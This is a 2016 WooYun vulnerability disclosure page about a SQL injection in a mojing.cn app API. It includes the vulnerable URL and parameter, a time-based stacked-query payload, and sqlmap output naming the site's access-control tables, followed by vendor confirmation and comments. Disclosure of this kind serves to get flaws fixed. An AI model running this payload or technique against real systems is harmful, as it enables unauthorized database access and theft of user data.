当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0211580

漏洞标题:暴风墨镜某站存在sql注入/59张表/权限控制数据库

相关厂商:mojing.cn

漏洞作者: hear7v

提交时间:2016-05-22 08:45

修复时间:2016-07-07 12:00

公开时间:2016-07-07 12:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-22: 细节已通知厂商并且等待厂商处理中
2016-05-23: 厂商已经确认,细节仅向厂商公开
2016-06-02: 细节向核心白帽子及相关领域专家公开
2016-06-12: 细节向普通白帽子公开
2016-06-22: 细节向实习白帽子公开
2016-07-07: 细节向公众公开

简要描述:

本来打算这几天来一波女性专题的,结果晚上来了这个洞

详细说明:

http://mj.cms.mojing.cn/api/v1/scene/video/testing.php?mobile_brand=Xiaomi&mobile_model=MI%204LTE&image_result=1&sound_result=1&telecom_operator=3&cpu_instruction_model=ARMv7%20Processor%20rev%201%20(v7l)&cpu_hardware_model=Qualcomm%20MSM8974PRO-AC
应该是app的api接口,抓包截获的流量,带上ua sqlmap,栈查询注入,
点信息
---
Parameter: cpu_hardware_model (GET)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: mobile_brand=Xiaomi&mobile_model=MI 4LTE&image_result=1&sound_result=1&telecom_operator=3&cpu_instruction_model=ARMv7 Processor rev 1 (v7l)&cpu_hardware_model=Qualcomm MSM8974PRO-AC');(SELECT * FROM (SELECT(SLEEP(5)))szhG)#
---

漏洞证明:

23:52] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[01:26:47] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
[01:26:47] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[01:26:55] [INFO] adjusting time delay to 2 seconds due to good response times
[01:26:57] [ERROR] invalid character detected. retrying..
[01:26:57] [WARNING] increasing time delay to 3 seconds
59
[01:27:22] [ERROR] invalid character detected. retrying..
[01:27:23] [WARNING] increasing time delay to 4 seconds
[01:27:23] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
acl_menu_url
[01:31:14] [INFO] retrieved: acl_permissions
[01:34:51] [INFO] retrieved: acl_resources
[01:37:40] [INFO] retrieved: acl_roles
[01:39:17] [INFO] retrieved: acl_user_to_role
[01:43:24] [INFO] retrieved: acl_users
[01:44:16] [INFO] retrieved: android_ba

修复方案:

过滤,厂商好冷,能送礼物么

版权声明:转载请注明来源 hear7v@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-23 11:54

厂商回复:

感谢您提交的漏洞,我们会尽快修复。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-22 08:59 | sauce ( 普通白帽子 | Rank:300 漏洞数:47 | 面向人民币编程)

    暴风墨镜

  2. 2016-05-22 09:05 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

    @sauce 我是文化人。

  3. 2016-05-22 09:21 | prolog ( 普通白帽子 | Rank:977 漏洞数:212 )

    又得改密码了,我擦

  4. 2016-05-22 10:36 | 放逐 ( 路人 | Rank:2 漏洞数:1 | 白帽子放逐Gg?得失乐与悲与Av Qq205655539)

    qwq

  5. 2016-05-22 21:01 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

    @prolog acl库,没大碍的

  6. 2016-05-23 16:04 | txt0t ( 路人 | Rank:8 漏洞数:8 | txt0t)

    可以可以

  7. 2016-05-30 23:42 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

    @暴风魔镜 要了联系方式,貌似没有收到礼物啊